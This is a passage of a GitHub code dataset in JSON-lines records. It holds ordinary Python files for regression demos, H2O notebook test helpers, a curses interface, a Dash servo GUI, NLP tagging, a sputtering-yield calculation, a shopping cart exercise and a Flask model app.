time.sleep(10)","repo_name":"jcbriggsjr/Time_Monitor","sub_path":"time_monitor.py","file_name":"time_monitor.py","file_ext":"py","file_size_in_byte":5598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"244468794","text":"\"\"\"\nThis example uses the kernel regression model to approximate\nthe third degree polynomial in toy_data.py\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\n\nfrom regression.kernel_regression.data.toy_data import third_degree_poly_with_noise\nfrom regression.kernel_regression.models.gaussian_kernel import predict\n\nnp.random.seed(101)\n\n# settings\nimages_path = '../generated_figures/'\n\n# Get data\nx_train = np.linspace(start=-2, stop=5, num=20).reshape((-1, 1))\ny_train = third_degree_poly_with_noise(x_train, 7)\n\nx_test = np.linspace(start=-1.00, stop=5, num=10).reshape((-1, 1))\ny_test = third_degree_poly_with_noise(x_test, 7).reshape((-1, 1))\n\n# Predict value for test data and computes MSE\ny_predicted = predict(x_test, x_train, y_train, 0.25)\nmse = mean_squared_error(y_test, y_predicted)\n\n# Plot Ground Truth and Predicted\nfig, ax = plt.subplots(figsize=(8, 5))\nax.plot(x_test, y_test, label='Ground Truth')\nax.plot(x_test, y_predicted, label='Predicted')\nax.set_xlabel('Input (x)')\nax.set_ylabel('Ground Truth and Predicted Output')\nax.set_title('Ground Truth vs Predicted\\nMSE ={0:.2f}'.format(mse))\nax.legend()\nfig.savefig(images_path + 'toy_third_degree_polynomial_predicted_vs_ground_truth.png')\nplt.show()\n","repo_name":"kylinmb/Data_Analysis_Sandbox","sub_path":"regression/kernel_regression/examples/toy_third_degree_polynomial.py","file_name":"toy_third_degree_polynomial.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3344075032","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.style\nplt.style.use(\"ggplot\")\ninput_data=list(range(1,24))\noutput_data=[2303,2554,2720,3865,2962,3552,3379,3370,3099,4370,3619,3610,3700,3880,3760,4874,4975,4713,5821,4680,3435,6088,6654]\n\nx=np.array(input_data)\ny=np.array(output_data)\n\ntheta_0=2000\ntheta_1=100\nalpha=0.01\nm=float(len(input_data))\nepochs=10000\n\nfor i in range(epochs):\n prediction=theta_0+(theta_1*x)\n diff_0=(sum(output_data-prediction))/(-m)\n diff_1=(sum((output_data-prediction)*x))/(-m)\n theta_0=theta_0-(alpha*diff_0)\n theta_1=theta_1-(alpha*diff_1)\nfinal_fit=theta_0+(theta_1*x)\n\nprint(\"Parameters used were: \",theta_0,theta_1)\n\nprint(\"May 24:\",round(theta_0+(theta_1*24)))\n\n\nplt.scatter(x,y,color=\"#007788\",label=\"Cases\")\nplt.plot([min(x),max(x)],[min(final_fit),max(final_fit)],color=\"#CC2A49\",label=\"Regression Line\")\nplt.title(\"COVID-19 Analysis (May,2020)\")\nplt.xlabel(\"Date\")\nplt.ylabel(\"No of Cases\")\nplt.legend()\nplt.tight_layout()\nplt.show()\n\n\n","repo_name":"iSriBalaji/MachineLearning","sub_path":"Linear Regression/Single_Var/Covid_Analysis_LinearRegression.py","file_name":"Covid_Analysis_LinearRegression.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13347886504","text":"# -*- encoding: utf-8 -*-\nimport json\nimport codecs\n\n\ndef ipy_notebook_exec(path, save_and_norun=None):\n notebook = json.load(codecs.open(path, \"r\", \"utf-8\"))\n program = ''\n for block in ipy_code_blocks(notebook):\n for line in ipy_valid_lines(block):\n if \"h2o.init\" not in line:\n program += line if '\\n' in line else line + '\\n'\n if save_and_norun is not None:\n with open(save_and_norun, \"w\") as f: f.write(program)\n else:\n exec(program, dict(__name__='main'))\n\ndef ipy_blocks(notebook):\n if 'worksheets' in list(notebook.keys()):\n return notebook['worksheets'][0]['cells'] # just take the first worksheet\n elif 'cells' in list(notebook.keys()):\n return notebook['cells']\n else:\n raise NotImplementedError(\"ipython notebook cell/block json format not handled\")\n\ndef ipy_code_blocks(notebook):\n return [cell for cell in ipy_blocks(notebook) if cell['cell_type'] == 'code']\n\ndef ipy_lines(block):\n if 'source' in list(block.keys()):\n return block['source']\n elif 'input' in list(block.keys()):\n return block['input']\n else:\n raise NotImplementedError(\"ipython notebook source/line json format not handled\")\n\ndef ipy_valid_lines(block):\n lines = ipy_lines(block)\n\n # matplotlib handling\n for line in lines:\n if \"import matplotlib.pyplot as plt\" in line or \"%matplotlib inline\" in line:\n import matplotlib\n matplotlib.use('Agg', warn=False)\n\n # remove ipython magic functions\n lines = [line for line in lines if not line.startswith('%')]\n\n # don't show any plots\n lines = [line for line in lines if \"plt.show()\" not in line]\n\n return lines\n\ndef pydemo_exec(test_name):\n with open(test_name, \"r\") as t: demo = t.read()\n program = ''\n for line in demo.split('\\n'):\n if \"h2o.init\" not in line:\n program += line if '\\n' in line else line + '\\n'\n demo_c = compile(program, '', 'exec')\n exec(demo_c, dict(__name__='main'))\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/pydemo_utils/utilsPY.py","file_name":"utilsPY.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"18600167989","text":"import re\n\n\ndef solution(str1, str2):\n answer = 0\n str1 = str1.upper()\n str2 = str2.upper()\n str1_list = []\n str2_list = []\n\n for i in range(len(str1) - 1):\n temp = str1[i:i + 2]\n if temp.isalpha() == True:\n str1_list.append(temp)\n\n for i in range(len(str2) - 1):\n temp = str2[i:i + 2]\n if temp.isalpha() == True:\n str2_list.append(temp)\n\n intersection = set(str1_list) & set(str2_list)\n union = set(str1_list) | set(str2_list)\n\n top = 0\n bot = 0\n for key in intersection:\n top += min(str1_list.count(key), str2_list.count(key))\n for key in union:\n bot += max(str1_list.count(key), str2_list.count(key))\n\n if bot == 0:\n answer = 1\n else:\n answer = top / bot\n answer = int(answer * 65536)\n return answer","repo_name":"Andrevile/Algorithm","sub_path":"Programmers/[1차] 뉴스 클러스터링.py","file_name":"[1차] 뉴스 클러스터링.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38552083534","text":"import curses\n\nw_width = 80\nmw_height = 30\ntw_height = 10\nsw_height = 1\n\n\nclass Interface(object):\n\n def __init__(self, stdscr, display_settings):\n self.stdscr = stdscr\n self.settings = display_settings\n\n self.show_splash()\n\n self.create_windows()\n\n self.mw.refmsg(\"this is the map window\", where=\"center\")\n self.tw.refmsg(\"this is the text window\", where=\"top_center\")\n self.sw.refmsg(\"this is the status window\", where=\"center\")\n\n\n def hold(self):\n try:\n # Preserve the status window's original contents\n prev_msg = self.sw.w.instr(0, 0, self.settings.w_width - 2)\n\n # Wait for the user to prompt execution to continue\n self.sw.refmsg(\"HOLD: press k to move on\")\n c = None\n while c != \"k\":\n c = self.stdscr.getkey()\n\n # Restore the status window's original contents\n self.sw.refmsg(prev_msg)\n\n except AttributeError:\n c = None\n while c != \"k\":\n c = self.stdscr.getkey()\n except Exception as err:\n raise EOFError\n\n\n def show_splash(self):\n self.stdscr.clear()\n self.stdscr.addstr(0, 0, \"interface initialized\")\n self.stdscr.addstr(1, 0, \"press k to move on\")\n self.stdscr.refresh()\n\n self.hold()\n\n\n def create_windows(self):\n cline = 0\n\n self.d0 = cursesWindow(1, self.settings[\"w_width\"], cline, 0)\n self.d0.refmsg(\"-\"*(self.settings[\"w_width\"] - 1))\n cline += 1\n\n self.mw = cursesWindow(self.settings[\"mw_height\"], self.settings[\"w_width\"], cline, 0)\n cline += self.settings[\"mw_height\"]\n\n self.d1 = cursesWindow(1, self.settings[\"w_width\"], cline, 0)\n self.d1.refmsg(\"-\"*(self.settings[\"w_width\"] - 1))\n cline += 1\n\n self.tw = cursesWindow(self.settings[\"tw_height\"], self.settings[\"w_width\"], cline, 0)\n cline += self.settings[\"tw_height\"]\n\n self.d2 = cursesWindow(1, self.settings[\"w_width\"], cline, 0)\n self.d2.refmsg(\"-\"*(self.settings[\"w_width\"] - 1))\n cline += 1\n\n self.sw = cursesWindow(self.settings[\"sw_height\"], self.settings[\"w_width\"], cline, 0)\n cline += self.settings[\"sw_height\"]\n\n self.d3 = cursesWindow(1, self.settings[\"w_width\"], cline, 0)\n self.d3.refmsg(\"-\"*(self.settings[\"w_width\"] - 1))\n\n\n def show_menu(self):\n self.mw.refmsg(\"This is the menu.\", where=\"center\")\n\n self.hold()\n\n\n def prompt_quit_game(self):\n self.stdscr.clear()\n self.stdscr.addstr(0, 0, \"Would you really like to quit? (press 'q' again)\")\n self.stdscr.refresh()\n\n rc = 0\n\n c = self.stdscr.getkey()\n if c == \"q\":\n rc = -1\n\n return -1\n\n\nclass cursesWindow(object):\n\n def __init__(self, height, width, y_start, x_start):\n self.height = height\n self.width = width\n self.y_start = y_start\n self.x_start = x_start\n\n self.w = curses.newwin(height, width, y_start, x_start)\n\n\n def refmsg(self, msg, where=\"upper_left\"):\n y_start = 0\n x_start = 0\n\n if where == \"center\":\n y_start = int(self.height / 2)\n\n if len(msg) < self.width:\n x_start = int((self.width - len(msg)) / 2)\n elif where == \"top_center\":\n y_start = 0\n if len(msg) < self.width:\n x_start = int((self.width - len(msg)) / 2)\n\n self.w.clear()\n self.w.addstr(y_start, x_start, msg)\n self.w.refresh()\n\n","repo_name":"biegelk/uriel","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72341352194","text":"\n################################################################################\n###\n### Libraries\n###\n################################################################################\nimport dash\n\nimport dash_core_components as dcc\nimport dash_bootstrap_components as dbc\nimport dash_html_components as html\n# import plotly.graph_objects as go\nfrom dash.dependencies import Input, Output\n\nfrom assets.servo_control import servo_manager\n\n\n################################################################################\n###\n### Setup\n###\n################################################################################\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.DARKLY, 'criddyp.css', 'custom.css'], title='servo GUI', update_title=None)\n# app.config.suppress_callback_exceptions = True\n\nsm = servo_manager()\n\n\n################################################################################\n###\n### Layout\n###\n################################################################################\napp.layout = html.Div([\n\n dbc.Row(\n [\n # counter clockwise\n dbc.Col(\n [\n dbc.Button('Counter Clockwise', id='b_spin_clock', className='center'),\n html.Div(id='ret_spin_clock'),\n ],\n ),\n\n # gauge to show current position\n dbc.Col(\n [\n dcc.Graph(id='fig', figure=sm.get_fig())\n ],\n ),\n\n # clockwise button\n dbc.Col(\n [\n dbc.Button('Clockwise', id='b_spin_counter', className='center'),\n html.Div(id='ret_spin_counter'),\n\n ],\n ), \n ],\n ),\n\n dbc.Row(\n [\n # return to zero\n dbc.Col(\n [\n dbc.Button('Return to zero', id='b_ret_zero', className='center'),\n html.Div(id='ret_ret_zero'),\n ], \n ),\n ],\n ),\n\n # interval\n dcc.Interval(\n id='interval',\n interval=500, # in milliseconds\n n_intervals=0\n )\n\n],className='body',)\n\n################################################################################\n###\n### Callbacks\n###\n################################################################################\n\n# counter clockwise\n@app.callback(\n Output(component_id='ret_spin_counter', component_property='children'),\n Input(component_id='b_spin_counter', component_property='n_clicks'),\n)\ndef spin_counter(n):\n global sm\n triggered = [p['prop_id'].split('.')[0] for p in dash.callback_context.triggered]\n if 'b_spin_counter' in triggered:\n print('ccw')\n sm.move_servo('ccw')\n return ''\n\n# clockwise\n@app.callback(\n Output(component_id='ret_spin_clock', component_property='children'),\n Input(component_id='b_spin_clock', component_property='n_clicks'),\n)\ndef spin_clock(n):\n global sm\n triggered = [p['prop_id'].split('.')[0] for p in dash.callback_context.triggered]\n if 'b_spin_clock' in triggered:\n print('cw')\n sm.move_servo('cw')\n return ''\n\n# return to zero\n@app.callback(\n Output(component_id='ret_ret_zero', component_property='children'),\n Input(component_id='b_ret_zero', component_property='n_clicks')\n)\ndef ret_zero(n):\n global sm\n triggered = [p['prop_id'].split('.')[0] for p in dash.callback_context.triggered]\n if 'b_ret_zero' in triggered:\n print('goto zero')\n sm.goto_zero()\n \n\n# update grapic\n@app.callback(\n Output(component_id='fig', component_property='figure'),\n Input(component_id='interval', component_property='n_intervals'),\n)\ndef update_fig(n):\n global sm\n return sm.get_fig()\n\n\n################################################################################\n###\n### Run\n###\n################################################################################\nif __name__ == '__main__':\n app.run_server(debug=True, port=8080, host='169.254.228.85')","repo_name":"einelson/simple-servo-gui","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40250891169","text":"import os\nimport pkuseg\nfrom pyltp import Postagger\nfrom pyltp import NamedEntityRecognizer\n\n\"\"\"使用pkuseg对文本进行分词,使用LTP进行词性标注和命名实体识别\"\"\"\n\nLTP_DATA_DIR = \"../../ltp_data_v3.4.0\" # ltp模型目录的路径,根据实际情况修改\ninput_file = \"../01数据预处理/txt_files/truth.txt\"\noutput_file = \"seg_pos_ner_result.txt\"\n\n# LTP词性标注模型\npos_model_path = os.path.join(LTP_DATA_DIR, 'pos.model') # 词性标注模型路径\npostagger = Postagger() # 初始化词性标注实例\npostagger.load(pos_model_path) # 加载模型\n\n# LTP命名实体识别模型\nner_model_path = os.path.join(LTP_DATA_DIR, 'ner.model') # 命名实体识别模型路径\nrecognizer = NamedEntityRecognizer() # 初始化命名实体识别实例\nrecognizer.load(ner_model_path) # 加载模型\n\n\ndef spn(text):\n \"\"\"对文本进行分词、词性标注、命名实体识别\"\"\"\n # 使用pkuseg工具分词\n text = text.replace(\"。\", \"\") # 去除句号\n seg = pkuseg.pkuseg(model_name='customized_model', user_dict='dict')\n words = seg.cut(text)\n postags = postagger.postag(words) # 词性标注\n netags = recognizer.recognize(words, postags) # 命名实体识别\n return zip(words, postags, netags)\n\n\n# 对文本进行分词、词性标注、命名实体识别\nf_input = open(input_file, \"r\", encoding=\"utf-8\")\nf_output = open(output_file, \"w\", encoding=\"utf-8\")\nlines = f_input.readlines()\nidx = 1\nfor line in lines:\n zipped = spn(line)\n for word, postag, netag in zipped:\n f_output.write(word + \"\\t\" + postag + \"\\t\" + netag + \"\\n\")\n f_output.write(\"\\n\")\n print(str(idx) + \" lines finished.\")\n idx += 1\n\nf_input.close()\nf_output.close()\n\n# 释放LTP模型\npostagger.release()\nrecognizer.release()\n","repo_name":"zhang17173/event-element-extraction-based-on-judgments","sub_path":"02分词、词性标注、命名实体识别/seg_pos_ner.py","file_name":"seg_pos_ner.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"28777530067","text":"from django.db import models\n\n# Create your models here.\n\nclass StoreImage(models.Model):\n licenseImage = models.ImageField(upload_to='images/')\n\nclass DriverInfo(models.Model):\n licenseNo=models.TextField()\n nameOfDriver=models.TextField()\n age=models.IntegerField()\n","repo_name":"joshiGaurav-2712/Automatic-Licence-Plate-Number-Recognition-Website","sub_path":"LPR/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71965474753","text":"import CGS as cgs\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import ode as ode\n\n\n\ndef finite_grain_correction(E, agrain, Zp, graphite):\n if graphite:\n p1 = 4.9\n p2 = 0.55\n p3 = 0.77\n p4 = 4.7\n p5 = 3.0\n p6 = 1.2\n ap = -4.37\n else:\n p1 = 1.0\n p2 = 0.5\n p3 = 1.0\n p4 = 1.8\n p5 = 2.1\n p6 = 0.76\n ap = -3.34\n\n\n rp = 10**(2.8*Zp**-0.21 + ap) * (E/cgs.eV) * 1e-7\n\n xs = agrain/(0.7*rp)\n\n fx = 1 + p1*np.exp(-np.log(xs/p2)**2/(2*p3**2)) - p4*np.exp(-(p5*xs - p6)**2)\n return max(fx,0)\n\ndef stopping_sigma(E, Mp, Zp, Md, Zd):\n a0 = 0.529*cgs.A\n asc = 0.885*a0*(Zp**(2/3) + Zd**(2/3))**(-1/2)\n\n ered = Md/(Mp + Md) * asc * E/(Zp*Zd*cgs.qe_ESU**2)\n\n si = 3.441*np.sqrt(ered) * np.log(ered + 2.718) / (1+6.35*np.sqrt(ered) + ered*(-1.708 + 6.882*np.sqrt(ered)))\n\n\n return 4*np.pi*asc*Zp*Zd*cgs.qe_ESU**2 * Mp/(Mp+Md) * si\n\n\n\ndef sputteringYield(E, Mp, Zp, Md, Zd, U0, K):\n mui = Md/Mp\n gi = 4*Mp*Md/(Mp + Md)**2\n \n if 1/mui <= 0.3:\n Ethresh = U0/(gi*(1-gi))*cgs.eV\n else:\n Ethresh = 8*U0*mui**(-1/3)*cgs.eV\n if E < Ethresh:\n return 0 \n\n if mui <= 0.5:\n alphai = 0.2\n elif mui < 1:\n alphai = 0.1/mui + 0.25*(mui - 0.5)**2\n else:\n alphai = 0.3*(mui - 0.6)**(2/3)\n\n\n Si = stopping_sigma(E, Mp, Zp, Md, Zd)\n\n yld = 4.2e14 * (Si/cgs.eV)/U0 * alphai/(K*mui +1) * (1 - (Ethresh/E)**(2/3))*(1 - Ethresh/E)**2\n return yld\n\ndef Maxwellian(Ener, kbTgas, Mpart):\n return (Mpart/(2*np.pi*kbTgas))**(1/2)*4*Ener/(kbTgas)*np.exp(-Ener/(kbTgas))\n\ndef maxwellSputteringYield(vel, integral, Mp, Zp, Md, Zd, U0, K, kbTgas, agrain, graphite):\n Ener = 0.5*Mp*cgs.mH*vel**2\n\n yld = sputteringYield(Ener, Mp, Zp, Md, Zd, U0, K)\n Maxwell = Maxwellian(Ener, kbTgas, Mp*cgs.mH)\n fx = finite_grain_correction(Ener, agrain, Zp, graphite)\n if(yld*Maxwell*vel*fx < 0):\n print(vel, yld, Maxwell, fx)\n return yld*Maxwell*vel*fx\n\ndef getAverageSputtering(Mp, Zp, Md, Zd, U0, K, kbTgas, agrain, graphite):\n mui = Md/Mp\n gi = 4*Mp*Md/(Mp + Md)**2\n \n if 1/mui <= 0.3:\n Ethresh = U0/(gi*(1-gi))*cgs.eV\n else:\n Ethresh = 8*U0*mui**(-1/3)*cgs.eV\n \n integrator = ode(maxwellSputteringYield).set_integrator('dopri5')\n integrator.set_initial_value(0, np.sqrt(2*Ethresh/(Mp*cgs.mH))).set_f_params(Mp, Zp, Md, Zd, U0, K, kbTgas, agrain, graphite)\n y = integrator.integrate(np.sqrt(100*kbTgas/(Mp*cgs.mH)))\n return max(y[0],0)\n\n\ndef getTotalLoss(Md, Zd, U0, K, kbTgas, proj_mass, proj_atom, proj_abund, agrain, graphite):\n\n totSputter = 0\n for pi in range(len(proj_mass)):\n totSputter += getAverageSputtering(proj_mass[pi], proj_atom[pi], Md, Zd, U0, K, kbTgas, agrain, graphite)*proj_abund[pi]\n\n return totSputter\n\n# projectile properties\nproj_mass = np.array([1, 4 , 12 , 14 , 16 ])\nproj_atom = np.array([1, 2 , 6 , 7 , 8 ])\nproj_abund = np.array([1, 0.1, 1e-4, 1e-5, 3e-4]) \n\n# carbon\nMd_c = 12\nZd_c = 6\nK_c = 0.61\nU0_c = 4.0\n\n#silicate\nMd_s = 20\nZd_s = 10\nK_s = 0.1\nU0_s = 5.8\nnumTemps = 50\nnumGrains = 30\nTgas = np.logspace(3,10, numTemps)\ntotLoss_graphite = np.zeros(Tgas.shape)\ntotLoss_silicone = np.zeros(Tgas.shape)\nagrains = np.logspace(np.log10(3*cgs.A), np.log10(1e-3), numGrains)\nwith open('sputtering_yield.dat', 'w') as f:\n f.write('# ngrain = {}\\n'.format(numGrains))\n f.write('# ntemps = {}\\n'.format(numTemps))\n for agrain in agrains:\n print(agrain)\n for i in range(len(Tgas)):\n totLoss_graphite[i] = getTotalLoss(Md_c, Zd_c, U0_c, K_c, cgs.kb*Tgas[i], proj_mass, proj_atom, proj_abund, agrain, 1)\n totLoss_silicone[i] = getTotalLoss(Md_s, Zd_s, U0_s, K_s, cgs.kb*Tgas[i], proj_mass, proj_atom, proj_abund, agrain, 0)\n f.write('{} {} {} {}\\n'.format(agrain, Tgas[i], totLoss_graphite[i], totLoss_silicone[i]))\n totLoss_graphite = totLoss_graphite * (Md_c*cgs.mH/(2*2.25))\n totLoss_silicone = totLoss_silicone * (Md_s*cgs.mH/(2*3.2))\n P = plt.plot(Tgas, totLoss_graphite/(1e-4/cgs.yr))\n plt.plot(Tgas, totLoss_silicone/(1e-4/cgs.yr), c = P[0].get_color(), ls = '--')\nplt.xscale('log')\nplt.yscale('log')\nplt.xlim(1e4, 1e10)\nplt.ylim(1e-9, 1e-4)\nplt.show()\n'''\nproj_mass = np.array([1, 2, 4, 20, 40])\nproj_atom = np.array([1, 1, 2, 10, 18])\nproj_cols = ['k', 'r', 'g', 'orange', 'b']\n\nEners = np.logspace(1, 6) * cgs.eV\nyelds = np.zeros(Eners.shape)\n\nfig, ax = plt.subplots(1,1)\nfor pi in range(len(proj_mass)):\n for i in range(len(Eners)):\n yelds[i] = sputteringYield(Eners[i], proj_mass[pi], proj_atom[pi], Md, Zd, U0, K)\n\n ax.plot(Eners/cgs.eV, yelds, c = proj_cols[pi])\nax.set_xscale('log')\nax.set_yscale('log')\nax.set_xlim(10, 1e6)\nax.set_ylim(1e-4, 10)\nplt.show()\n'''\n\n\n\n\n\n","repo_name":"LokeOhlin/MOSHPIT","sub_path":"tools/SputteringTable_generator/sputtering_yields.py","file_name":"sputtering_yields.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31384702281","text":"# Colton DeWitt - May 3, 2022\r\nclass ItemToPurchase:\r\n def __init__(self, item_name='none', item_description='none',\r\n item_price=0, item_quantity=0): # Initialize and sets defaults of item to buy\r\n self.item_name = item_name\r\n self.item_description = item_description\r\n self.item_price = item_price\r\n self.item_quantity = item_quantity\r\n\r\n def print_item_description(self): # Print the item description\r\n print('{}: {}'.format(self.item_name, self.item_description))\r\n\r\n def print_item_cost(self): # Calculates total cost of items and prints it\r\n total_cost = self.item_price * self.item_quantity\r\n print('{} {} @ ${} = ${}'.format(self.item_name, self.item_quantity, self.item_price, total_cost))\r\n #return total_cost\r\n\r\nclass ShoppingCart: # Customer's shopping cart\r\n def __init__(self, customer_name='none', current_date='January 1, 2016', cart_items=[]):\r\n self.customer_name = customer_name\r\n self.current_date = current_date\r\n self.cart_items = cart_items\r\n\r\n def add_item(self, item): # Adds an item to customer's cart\r\n self.cart_items.append(item)\r\n\r\n def remove_item(self, removing_item): # Remove an item from customer's cart\r\n item_removed = False\r\n for item in self.cart_items: # Iterate through the customer's cart\r\n if removing_item == item.item_name: # Search each class object in cart and check the name\r\n self.cart_items.remove(item) # Remove the class object with the matching name of item to remove\r\n print()\r\n item_removed = True\r\n\r\n if item_removed == False:\r\n print('Item not found in cart. Nothing removed.\\n')\r\n\r\n def modify_item(self, changing_item, changed_quantity):\r\n item_changed = False\r\n for item in self.cart_items:\r\n if changing_item == item.item_name: # Search each class object in cart and check the name\r\n item.item_quantity = changed_quantity # Update the quantity attribute of the correct instance object\r\n item_changed = True\r\n\r\n if item_changed == False:\r\n print('Item not found in cart. Nothing modified.\\n')\r\n\r\n def get_num_items_in_cart(self):\r\n num_items_in_cart = 0\r\n for item in self.cart_items: # Iterate through the cart\r\n num_items_in_cart += item.item_quantity # Check each instances quantity attribute and add to num_items_in_c\r\n return num_items_in_cart # Quantity of items in the cart\r\n\r\n def get_cost_of_cart(self):\r\n total_cost_cart = 0\r\n for item in self.cart_items: # TODO Validate if cart is empty???\r\n total_cost_cart += item.item_price * item.item_quantity # For example, three $1 water bottle: 1 * 3 bottles\r\n return total_cost_cart\r\n\r\n def print_total(self): # Print the user's shopping cart and items in it, with their prices. Also total price at end\r\n print('{}\\'s Shopping Cart - {}'.format(self.customer_name, self.current_date))\r\n if self.get_num_items_in_cart() == 0:\r\n print('Number of Items: {}\\n'.format(self.get_num_items_in_cart())) # In this case prints 0 items\r\n print('SHOPPING CART IS EMPTY')\r\n else:\r\n print('Number of Items: {}\\n'.format(self.get_num_items_in_cart())) # Print quantity of items\r\n for item in self.cart_items: # Iterate though the shopping cart\r\n item.print_item_cost() # Print each item in cart and its cost\r\n\r\n print('\\nTotal: ${}\\n'.format(self.get_cost_of_cart())) # Print total cost of all items in cart\r\n\r\n def print_descriptions(self): # Print the user's shopping cart and each item's description. No prices\r\n print('{}\\'s Shopping Cart - {}'.format(self.customer_name, self.current_date))\r\n print('\\nItem Descriptions')\r\n for item in self.cart_items:\r\n item.print_item_description()\r\n print()\r\n\r\n\r\ndef print_menu(): # Print to the user the main menu and their available options\r\n #valid_options = ['a', 'r', 'c', 'i', 'o', 'q']\r\n print('MENU\\n'\r\n 'a - Add item to cart\\n'\r\n 'r - Remove item from cart\\n'\r\n 'c - Change item quantity\\n'\r\n 'i - Output items\\' descriptions\\n'\r\n 'o - Output shopping cart\\n'\r\n 'q - Quit')\r\n #user_choice = input('\\nChoose an option:\\n')\r\n #while user_choice not in valid_options:\r\n #print('Invalid choice. Please try again')\r\n #user_choice = input('\\nChoose an option:\\n')\r\n\r\n #return user_choice\r\n\r\n\r\ndef execute_menu(user_choice, shopping_cart): # Get's the user's choice of action from main and the current shop cart\r\n\r\n if user_choice == 'a':\r\n print('ADD ITEM TO CART')\r\n new_item = ItemToPurchase(input('Enter the item name:\\n'), input('Enter the item description:\\n'),\r\n int(input('Enter the item price:\\n')), int(input('Enter the item quantity:\\n')))\r\n shopping_cart.add_item(new_item)\r\n print()\r\n elif user_choice == 'r':\r\n print('REMOVE ITEM FROM CART')\r\n item_to_remove = input('Enter name of item to remove:\\n')\r\n shopping_cart.remove_item(item_to_remove)\r\n elif user_choice == 'c':\r\n print('CHANGE ITEM QUANTITY')\r\n item_to_change = input('Enter the item name:\\n')\r\n new_quantity = int(input('Enter the new quantity:\\n'))\r\n shopping_cart.modify_item(item_to_change, new_quantity)\r\n elif user_choice == 'i':\r\n print('OUTPUT ITEMS\\' DESCRIPTIONS') # Print the user's shopping cart and each item's description. No prices\r\n shopping_cart.print_descriptions()\r\n elif user_choice == 'o':\r\n print('OUTPUT SHOPPING CART') # Shopping cart items and their prices, plus total price of cart\r\n shopping_cart.print_total()\r\n\r\n\r\nif __name__ == '__main__':\r\n customer_cart1 = ShoppingCart(input('Enter customer\\'s name:\\n'), input('Enter today\\'s date:\\n'))\r\n print('\\nCustomer name: {}\\nToday\\'s date: {}\\n'.format(customer_cart1.customer_name, customer_cart1.current_date))\r\n\r\n valid_options = ['a', 'r', 'c', 'i', 'o', 'q']\r\n user_choice_option = 'none'\r\n while user_choice_option != 'q': # Will loop until the user quits the program with 'q'\r\n print_menu()\r\n user_choice_option = 'none'\r\n while user_choice_option not in valid_options:\r\n # print('Invalid choice. Please try again')\r\n user_choice_option = input('\\nChoose an option:') # Get user choice here, must be in valid_options list ^\r\n print()\r\n execute_menu(user_choice_option, customer_cart1)\r\n #if user_choice_option != 'q':\r\n #execute_menu(customer_cart1)\r\n\r\n print('User exited the program. Have a nice day.') # Will print after user input 'q', while loop ended\r\n","repo_name":"Ecdewitt1230/Python-code-samples","sub_path":"Shopping Cart.py","file_name":"Shopping Cart.py","file_ext":"py","file_size_in_byte":6903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5430124296","text":"OpenDatabase(\"~/Development/data/silo_hdf5_test_data/bigsil.silo\")\nDefineScalarExpression(\"zid\", \"zoneid(mesh)\")\nDefineScalarExpression(\"radial\", \"recenter(dist)\")\nAddPlot(\"Pseudocolor\", \"zid\")\nDrawPlots()\n\nAddOperator(\"Isosurface\")\niso = IsosurfaceAttributes()\niso.contourNLevels = 3\niso.variable = \"dist\"\nSetOperatorOptions(iso)\nDrawPlots()\n\n# The bug is after this.\nChangeActivePlotsVar(\"dist\")\nSaveWindow() # junky picture\n\n# Make the right picture now.\nCloseComputeEngine()\nClearWindow()\nDrawPlots()\nSaveWindow()\n","repo_name":"aowen87/VisIt_Redmine_2_Github","sub_path":"archive/git_labeled_attachments/1875_bug.py","file_name":"1875_bug.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32484734735","text":"import numpy as np\nimport pandas as pd\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\n# cors = CORS(app)\nimport pickle\n\napp = Flask(__name__)\nmodel = pickle.load(open('model_final.pkl','rb'))\nwarehouse={'Agartala': 0, 'Agra': 1, 'Ahmednagar': 2, 'Ajmer': 3, 'Akola': 4, \n'Aligarh': 5, 'Allahabad': 6, 'Alwar': 7, 'Ambala': 8, 'Amravati': 9, 'Amritsar': 10, \n'Amroha': 11, 'Anand': 12, 'Anantapur': 13, 'Angul': 14, 'Arrah': 15, 'Asansol': 16, \n'Aurangabad': 17, 'Baddi': 18, 'Bahadurgarh': 19, 'Balasore': 20, 'Bangalore': 21, \n'Bankura': 22, 'Banswara': 23, 'Barabanki': 24, 'Bardhaman': 25, 'Bareilly': 26, \n'Beed': 27, 'Belgaum': 28, 'Berhampur': 29, 'Betul': 30, 'Bhadrak': 31, 'Bhagalpur': 32,\n 'Bhandara': 33, 'Bharatpur': 34, 'Bharuch': 35, 'Bhavnagar': 36, 'Bhilai': 37, 'Bhimavaram': 38,\n 'Bhiwadi': 39, 'Bhiwani': 40, 'Bhopal': 